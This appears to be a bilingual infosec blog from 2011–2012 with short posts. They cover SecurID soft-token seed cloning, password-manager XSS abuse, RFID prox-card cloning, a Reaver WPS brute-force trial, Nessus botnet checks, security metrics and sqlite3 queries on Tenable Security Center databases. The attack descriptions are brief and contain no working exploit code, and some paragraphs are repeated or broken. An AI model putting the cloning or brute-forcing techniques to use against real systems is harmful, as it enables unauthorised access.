SensePost demonstrated on its blog last week how a determined attacker can bypass the protection offered by SecurID soft tokens. The secret values (seed) can be deduced by taking control of a system (e.g. hardware theft, malware).
Last week’s blog post by SensePost’s Behrang Fouladi demonstrated another way determined attackers could in certain cases circumvent protections built into SecurID.
By reverse engineering software used to manage the cryptographic software tokens on computers running Microsoft’s Windows operating system, he found that the secret “seed” was easy for people with control over the machines to deduce and copy. He provided step-by-step instructions for others to follow in order to demonstrate how easy it is to create clones that mimic verbatim the output of a targeted SecurID token.
“When the above has been performed, you should have successfully cloned the victim’s software token and if they run the SecurID software token program on your computer, it will generate the exact same random numbers that are displayed on the victim’s token,” Fouladi wrote.

May 9, 2012

Beware of password managers built into browsers

This article shows a perfect example of why one should avoid using the (overly automated) managers built into web browsers.
The article Abusing Password Managers with XSS « Neohapsis Labs is the perfect example for why we avoid using automated password submission features in web browsers (either built-in, plugins or other tools). We somehow need to reach a balance between security and ease-of-use.

Mar 12, 2012

OpenDNS – Parental Controls

To be used on your home network: the protection services of There are several free options, but I particularly like the OpenDNS HomeVIP service, which costs only $20/year. This option provides reports on the use of your Internet service. More information here: OpenDNS – Parental Controls.
Everybody should be using this service at home: OpenDNS – Parental Controls.
There are various options but I particularly like the HomeVIP option. It costs 20$/year but it provides reporting that is very useful to understand your Internet usage.

Jan 12, 2012

Nessus, IID & botnet detection

Brought to you by Tenable…
Nessus uses data provided by Internet Identity (IID), a company that maintains a list of hosts it has determined, through various technical means, are part of a botnet. Nessus does not perform the technical checks itself; rather, it compares the IP addresses being scanned against a list maintained by IID. Inclusion in IID's list is typically accurate; they experience a very low rate of false positives.
If a host is reported as part of a botnet, there are several things you can do to help validate the finding and respond to the issue:
  1. Check the host against additional third-party lists to determine if the host shows up in those resources:,,
  2. Check the host against known Unsolicited Bulk E-mail UBE/spam blacklists:
  3. Look for any evidence of the host being compromised e.g., suspicious activity, newly installed software, machine resources being heavily utilized.
  4. Perform a full vulnerability scan to determine if any high-risk or critical vulnerabilities are present, that may represent the point of intrusion. Ensure web application auditing is enabled, as Nessus can identify malicious web content related to botnet activities.
  5. Move the host to an isolated network and use a network sniffer to monitor traffic being sent from the machine.
If you still have questions about your host appearing in the list, you can contact IID at with questions. Your initial mail should include the IP address in question, when the IP was reported (i.e., when you ran your Nessus scan) and any additional information about the host that may be relevant. (via Tenable Customer Support Portal, for registered users)

Jan 11, 2012

Cloning "Prox" and RFID access cards

Here is a very interesting site that shows how to clone contactless access cards (proximity cards). The author provides his electronic schematics and cloning techniques.

Jan 8, 2012

Installing Google Chrome Frame in Internet Explorer

Here is where to go to install Google Chrome Frame, the module for Internet Explorer. To learn more about this way of using Chrome from within Internet Explorer, a good introduction is here. Adding this IE module allows, for instance, the use of HTML5 extensions.

Checking a web site’s performance

The WebPagetest site offers several options for checking a web site’s performance in order to optimize it.

Jan 4, 2012

What do you have to lose?

What does one stand to lose in a cyber attack? It depends on your sector of activity, but in general:
Reputation and trademark
  • Negative public attention
  • Loss of future revenue
Financial viability
  • Costs of internal investigations and crisis management
  • Non-compliance and disclosure penalties
  • Drop in stock market value
Intellectual property
  • Disclosure of confidential information, of your processes, of your customer list…
Confidentiality and partners
  • Lawsuits
  • Loss of customer and partner trust

Jan 3, 2012

Wi-Fi vulnerability via WPS

Here are details on the vulnerability that allows WPA/WPA2 security to be practically bypassed when “Wi-Fi Protected Setup” is enabled on a wireless access point (for certain models and manufacturers). A spreadsheet containing WPS vulnerability test results is under construction (by the security community).

NB: I tried Reaver 1.3 with little success against a DLink DIR-655. The tool works by giving it a specific PIN in order to obtain the pre-shared key (PSK). But after approximately 60 to 80 PIN-guessing (brute-force) requests, the DLink no longer accepts attempts without a router reset, which makes the attack useless. Based on my tests (with a few other models/manufacturers), I believe this problem may be more widespread than one imagines… My testing with the DLink DIR-655 has been inconclusive, i.e. the device doesn’t appear to be vulnerable.

Nov 28, 2011

Mozilla Firefox about:config

Mozilla Firefox allows the configuration of many parameters that are not all available through its user interface. To reach them, enter about:config in the address bar. But what do all these parameters and their associated values mean? To answer this question, here is a reference to the entries in about:config, where all user preferences in Mozilla Firefox can be viewed and modified.

Measuring security – Security measures

Here are a few references that help with measuring information security (KPIs, KRIs, KCIs):
  1. NIST SP800-55: Performance Measurement Guide for Infosec (see Appendix A for examples)
  2. NIST SP800-53: Assessing Security Controls, Building Effective Security Assessment Plans
  3. NIST SP800-40: Section 3 – Security Metrics for Patch & Vulnerability Mgmt
  4. NIST Maturity Levels: high-level security program maturity
  5. ISO 27004:2009: IT Security Techniques – Infosec Mgmt – Measurement – top-down & bottom-up approach to security metrics, in line with the other 27K standards
  6. ISO 21827:2008: IT Security Techniques – Systems Security Engineering – Capability Maturity Model (SSE-CMM)
  7. Security Metrics: Replacing Fear, Uncertainty and Doubt (book)
  8. DoD’s Measuring Security: published in 2009, compares NIST, ISO, ISACA…; refers to other sources:

Nov 18, 2011

Tenable Security Center and sqlite

The Tenable Security Center product uses an sqlite database. Here are a few commands that help extract information from Security Center’s database files, using the sqlite3 command…

# cd /opt/sc4
# /opt/sc4/support/bin/sqlite3 application.db ".tables"
AcceptRiskRules                   AppStyle
AdminDashboardTab                 AppStyleAttribute
AdminPreferences                  AppStyleFamily
AdminUser                         AppStyleFamilyMapping
AppAuditFile                      AppWindowsCredential
AppAuditFilePlugins               AssetTemplate
AppCredential                     AssetTemplateClause
AppDashboardComponent             AssetTemplateClauseGroup
AppDashboardTab                   Configuration
AppDataTimestamps                 CorrelatedRepositoryLCE
AppKerberosCredential             Email
AppPolicy                         LCE
AppPolicyAuditFile                LCESilo
AppPolicyDisabledPlugins          LCETypes
AppPolicyEnabledPlugins           OrgLCE
AppPolicyFamily                   OrgRepository
AppPolicyPluginPrefs              Organization
AppPolicyTemplate                 PassiveScanner
AppPolicyTemplateAuditFile        PassiveScannerRepository
AppPolicyTemplateDisabledPlugins  RecastRiskRules
AppPolicyTemplateEnabledPlugins   Repository
AppPolicyTemplateFamily           Scanner
AppPolicyTemplatePluginPrefs      UserAuth
AppReportTemplate                 Zone
AppRole                           ZoneOrganization
AppSNMPCredential                 ZoneScanner
AppSSHCredential                  sc4Schema

# /opt/sc4/support/bin/sqlite3 jobqueue.db ".tables"
JobQueue   sc4Schema

# /opt/sc4/support/bin/sqlite3 application.db "SELECT * FROM Configuration"
# /opt/sc4/support/bin/sqlite3 application.db ".schema"
CREATE TABLE [Configuration] (
[type] INTEGER,
, [editable] BOOLEAN NOT NULL DEFAULT 'true');
CREATE TABLE [CorrelatedRepositoryLCE] (
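The same .tables and SELECT queries done from Python, as an added example that is not Tenable’s code: it works on a copy of the file and opens it read-only so the live /opt/sc4 database is never modified by mistake, and it validates the table name against the catalogue because a table name cannot be bound as a query parameter. The sample database it builds is constructed here (the Configuration columns follow the .schema fragment above) and is not real Security Center data.

```python
import os
import sqlite3
import tempfile
from contextlib import closing

# Added example, not Tenable's code: the .tables and SELECT queries above done
# from Python on a COPY of the file, opened read-only so the live /opt/sc4
# database is never modified by mistake.

def open_readonly(path):
    """mode=ro makes sqlite refuse any write, whatever the code does later."""
    return sqlite3.connect(f"file:{os.path.abspath(path)}?mode=ro", uri=True)

def list_tables(path):
    """Equivalent of .tables: table names from the sqlite_master catalogue."""
    with closing(open_readonly(path)) as conn:
        rows = conn.execute(
            "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"
        ).fetchall()
    return [r[0] for r in rows]

def dump_table(path, table):
    """SELECT * FROM <table> as a list of dicts. A table name cannot be bound
    as a ? parameter, so it is checked against the catalogue, not interpolated."""
    if table not in list_tables(path):
        raise ValueError(f"unknown table: {table!r}")
    quoted = table.replace('"', '""')  # identifier quoting for the validated name
    with closing(open_readonly(path)) as conn:
        conn.row_factory = sqlite3.Row
        rows = conn.execute(f'SELECT * FROM "{quoted}"').fetchall()
    return [dict(r) for r in rows]

def make_sample_db(path):
    """Constructed stand-in for application.db (not real Security Center data);
    the Configuration columns follow the .schema fragment shown above."""
    with closing(sqlite3.connect(path)) as conn, conn:
        conn.execute("CREATE TABLE [Configuration] ([type] INTEGER, [name] TEXT,"
                     " [value] TEXT, [editable] BOOLEAN NOT NULL DEFAULT 'true')")
        conn.execute("CREATE TABLE [sc4Schema] ([version] TEXT)")
        conn.executemany("INSERT INTO Configuration VALUES (?, ?, ?, ?)",
                         [(1, "sessionTimeout", "3600", "true"),
                          (2, "schemaVersion", "4", "false")])

def demo():
    """Build the sample in a temp dir; return (table names, Configuration rows)."""
    with tempfile.TemporaryDirectory() as d:
        db = os.path.join(d, "application.db")
        make_sample_db(db)
        return list_tables(db), dump_table(db, "Configuration")
```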

Nov 16, 2011

New version of Burp Suite Professional

As always, Dafydd Stuttard aka Portswigger is doing miracles with Burp. The latest version simplifies “cross-site request forgery” testing. Previous versions added proper handling of streamed HTTP responses, improved “grep” keyword matching and a session-tracking debugger, among other things. More details can be found in his Release Notes.